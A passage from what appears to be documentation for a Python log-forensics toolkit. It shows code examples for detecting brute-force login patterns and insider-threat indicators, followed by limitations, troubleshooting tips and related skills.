    accounts[f.target_account].append(f)

# Find accounts with many failures
for account, failures in accounts.items():
    if len(failures) > 10:
        print(f"Account: {account}")
        print(f"  Failures: {len(failures)}")
        unique_ips = set(f.source_ip for f in failures)
        print(f"  Source IPs: {unique_ips}")

# Check for successful logins after failures
auth_analyzer = AuthenticationAnalyzer()
auth_analyzer.add_parser(parser)
compromise_indicators = auth_analyzer.find_success_after_failure()
```
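Conceptually, `find_success_after_failure` hunts for a successful logon preceded by a burst of failures for the same account, the classic password-guessing fingerprint. A toolkit-independent sketch of that logic (the event tuple shape and thresholds here are illustrative assumptions):

```python
from datetime import datetime, timedelta

def success_after_failures(events, min_failures=5, window=timedelta(minutes=10)):
    """events: (timestamp, account, ok) tuples sorted by time.

    Return (account, timestamp) pairs where a successful logon follows
    >= min_failures failed attempts within the preceding window.
    """
    suspicious = []
    for i, (ts, account, ok) in enumerate(events):
        if not ok:
            continue
        recent_failures = sum(
            1 for t, a, s in events[:i]
            if a == account and not s and ts - t <= window
        )
        if recent_failures >= min_failures:
            suspicious.append((account, ts))
    return suspicious

# Six failures against "svc" in six minutes, then a success:
base = datetime(2024, 3, 15, 2, 0)
events = [(base + timedelta(minutes=m), "svc", False) for m in range(6)]
events.append((base + timedelta(minutes=6), "svc", True))
events.append((base + timedelta(minutes=7), "alice", True))
print(success_after_failures(events))  # only "svc" is flagged
```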

Example 2: Insider Threat Investigation

Scenario: Analyzing logs for insider threat indicators

```python
from log_forensics import LogCorrelator, EventLogParser, FileAccessParser

# Combine multiple log sources
correlator = LogCorrelator()
correlator.add_source("security", EventLogParser("/evidence/Security.evtx"))
correlator.add_source("files", FileAccessParser("/evidence/file_audit.evtx"))

# Analyze a specific user's activity
user = "john.smith"
user_timeline = correlator.get_user_activity(user)

# Look for data collection indicators
data_access = correlator.find_bulk_file_access(
    user=user,
    threshold=100,
    time_window_hours=1
)

# Check for off-hours activity
off_hours = correlator.find_off_hours_activity(
    user=user,
    business_hours=(9, 18),
    business_days=[0, 1, 2, 3, 4]  # Mon-Fri
)

# Generate insider threat report
correlator.generate_insider_report(user, "/evidence/insider_report.html")
```
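The off-hours check reduces to comparing each event's weekday and hour against a business-hours window. A minimal, self-contained sketch of that filter (the event shape, a bare `datetime`, is an assumption for illustration):

```python
from datetime import datetime

def outside_business_hours(events, business_hours=(9, 18),
                           business_days=(0, 1, 2, 3, 4)):
    """Return events outside Mon-Fri 09:00-18:00 (end hour exclusive)."""
    start, end = business_hours
    return [ts for ts in events
            if ts.weekday() not in business_days
            or not (start <= ts.hour < end)]

# A Saturday 02:00 file access is flagged; a Tuesday 10:00 one is not:
print(outside_business_hours([datetime(2024, 3, 16, 2, 0),
                              datetime(2024, 3, 12, 10, 0)]))
```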

Limitations

  • Large log files may require significant memory
  • Some log formats may not be fully supported
  • Timestamp parsing depends on consistent formats
  • Anomaly detection requires sufficient baseline data
  • Real-time analysis not supported
  • Encrypted logs cannot be parsed
  • Log rotation may cause gaps in analysis

Troubleshooting

Common Issue 1: EVTX Parsing Errors

Problem: Unable to parse a Windows Event Log file

Solution:
  • Check the file for corruption
  • Ensure the file is complete (not truncated)
  • Try an alternative parser

Common Issue 2: Timestamp Misalignment

Problem: Events from different sources don't correlate

Solution:
  • Verify source timezones
  • Use the normalize_timestamps option
  • Check for clock skew
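When sources disagree, normalizing timestamps to UTC by hand is straightforward; here is a sketch using only the standard library (the format string and zone name are example values, not toolkit defaults):

```python
from datetime import datetime
from zoneinfo import ZoneInfo

def to_utc(raw, fmt, source_tz):
    """Attach the source host's timezone to a naive timestamp, then convert to UTC."""
    naive = datetime.strptime(raw, fmt)
    return naive.replace(tzinfo=ZoneInfo(source_tz)).astimezone(ZoneInfo("UTC"))

# 14:30 on a US Eastern host (EDT in March 2024, UTC-4) is 18:30 UTC:
print(to_utc("2024-03-15 14:30:00", "%Y-%m-%d %H:%M:%S", "America/New_York"))
```

Apply the same conversion to every source before correlating, so that a four-hour offset is never mistaken for a four-hour gap between events.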

Common Issue 3: Memory Exhaustion

Problem: Out of memory on large log files

Solution:
  • Use streaming mode
  • Process logs in chunks
  • Increase the max_memory_mb setting

Related Skills

  • timeline-forensics: Super timeline creation
  • memory-forensics: Correlate with memory analysis
  • network-forensics: Correlate with network captures
  • registry-forensics: Windows registry analysis
  • incident-response: IR workflow integration

References

  • Log Forensics Reference
  • Windows Event ID Guide
  • Log Format Specifications